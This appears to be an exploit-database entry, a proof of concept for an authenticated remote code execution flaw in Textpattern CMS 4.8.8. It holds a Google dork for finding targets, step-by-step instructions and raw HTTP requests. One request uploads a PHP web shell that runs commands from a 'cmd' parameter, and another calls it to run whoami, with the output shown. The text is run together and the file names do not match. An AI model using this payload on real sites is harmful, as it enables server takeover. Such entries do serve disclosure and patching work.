Headline
Textpattern 4.8.8 Remote Code Execution
Textpattern version 4.8.8 suffers from an authenticated remote code execution vulnerability.
# Exploit Title: Textpattern 4.8.8 - Remote Code Execution (RCE) (Authenticated)# Exploit Author: Alperen Ergel# Contact: @alpernae (IG/TW)# Software Homepage: https://textpattern.com/# Version : 4.8.8# Tested on: windows 11 xammp | Kali linux# Category: WebApp# Google Dork: intext:"Published with Textpattern CMS"# Date: 10/09/2022######### Description ########## Step 1: Login admin account and go settings of site# Step 2: Upload a file to web site and selecet the rce.php# Step3 : Upload your webshell that's it...######### Proof of Concept ########========>>> START REQUEST <<<=========############# POST REQUEST (FILE UPLOAD) ############################## (1)POST /textpattern/index.php?event=file HTTP/1.1Host: localhostContent-Length: 1038sec-ch-ua: "Chromium";v="105", "Not)A;Brand";v="8"Accept: text/javascript, application/javascript, application/ecmascript, application/x-ecmascript, */*; q=0.01Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryMgUEFltFdqBVvdJuX-Requested-With: XMLHttpRequestsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/105.0.5195.102 Safari/537.36sec-ch-ua-platform: "Windows"Origin: http://localhostSec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: http://localhost/textpattern/index.php?event=fileAccept-Encoding: gzip, deflateAccept-Language: tr-TR,tr;q=0.9,en-US;q=0.8,en;q=0.7Cookie: txp_login=admin%2C94d754006b895d61d9ce16cf55165bbf; txp_login_public=4353608be0adminConnection: close------WebKitFormBoundaryMgUEFltFdqBVvdJuContent-Disposition: form-data; name="fileInputOrder"1/1------WebKitFormBoundaryMgUEFltFdqBVvdJuContent-Disposition: form-data; name="app_mode"async------WebKitFormBoundaryMgUEFltFdqBVvdJuContent-Disposition: form-data; name="MAX_FILE_SIZE"2000000------WebKitFormBoundaryMgUEFltFdqBVvdJuContent-Disposition: form-data; name="event"file------WebKitFormBoundaryMgUEFltFdqBVvdJuContent-Disposition: form-data; name="step"file_insert------WebKitFormBoundaryMgUEFltFdqBVvdJuContent-Disposition: form-data; name="id"------WebKitFormBoundaryMgUEFltFdqBVvdJuContent-Disposition: form-data; name="_txp_token"16ea3b64ca6379aee9599586dae73a5d------WebKitFormBoundaryMgUEFltFdqBVvdJuContent-Disposition: form-data; name="thefile[]"; filename="rce.php"Content-Type: application/octet-stream<?php if(isset($_REQUEST['cmd'])){ echo "<pre>"; $cmd = ($_REQUEST['cmd']); system($cmd); echo "</pre>"; die; }?>------WebKitFormBoundaryMgUEFltFdqBVvdJu--############ POST RESPONSE (FILE UPLOAD) ######### (1)HTTP/1.1 200 OKDate: Sat, 10 Sep 2022 15:28:57 GMTServer: Apache/2.4.53 (Win64) OpenSSL/1.1.1n PHP/8.1.6X-Powered-By: PHP/8.1.6X-Textpattern-Runtime: 35.38 msX-Textpattern-Querytime: 9.55 msX-Textpattern-Queries: 16X-Textpattern-Memory: 2893 kBContent-Length: 270Connection: closeContent-Type: text/javascript; charset=utf-8___________________________________________________________________________________________________________________________________________________############ REQUEST TO THE PAYLOAD ############################### (2)GET /files/c.php?cmd=whoami HTTP/1.1Host: localhostsec-ch-ua: "Chromium";v="105", "Not)A;Brand";v="8"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/105.0.5195.102 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9Sec-Fetch-Site: noneSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentAccept-Encoding: gzip, deflateAccept-Language: tr-TR,tr;q=0.9,en-US;q=0.8,en;q=0.7Cookie: txp_login_public=4353608be0adminConnection: close############ RESPONSE THE PAYLOAD ############################### (2)HTTP/1.1 200 OKDate: Sat, 10 Sep 2022 15:33:06 GMTServer: Apache/2.4.53 (Win64) OpenSSL/1.1.1n PHP/8.1.6X-Powered-By: PHP/8.1.6Content-Length: 29Connection: closeContent-Type: text/html; charset=UTF-8<pre>alpernae\alperen</pre>========>>> END REQUEST <<<=========